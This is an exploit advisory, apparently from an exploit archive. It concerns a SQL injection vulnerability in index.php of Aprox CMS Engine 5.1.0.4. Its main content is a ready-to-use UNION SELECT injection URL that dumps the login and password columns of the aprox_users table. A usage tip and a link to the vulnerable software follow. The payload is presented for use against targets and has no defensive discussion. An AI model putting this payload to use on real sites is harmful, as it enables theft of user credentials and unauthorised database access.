id: 3426
date: 07/17/2008
title: Aprox CMS Engine 5.1.0.4 (index.php page) SQL Injection Vulnerability
author: Mr.SQL
cves: 

=====================================================================
Aprox CMS Engine 5.1.0.4 (index.php page) SQL Injection Vulnerability
=====================================================================



###############################################################
#################### Viva IslaM Viva IslaM ####################
##
## Remote SQL injection Vulnerability
##
## Aprox CMS Engine V5.1.0.4 ( index.php page )
##                            
###############################################################
########################
########################
##
## -[[: Exploite :]]-
##
## www.Target.com/index.php?id=-1'+UNION+SELECT+0,0,0,0,0,0,0,0,'MrSQL',0,password,login,0,0,0+FROM+aprox_users/*
##
########################
########################
 -[[ NOTE ]]-
1 ) dont use the tags in the exploite most get the info without concat()
2 ) Download script :  http://www.aprox.de/engine/data/files/AproxEngine_V5_1_04.zip

#######################################################################################################



#  0day.today [2023-03-27]  #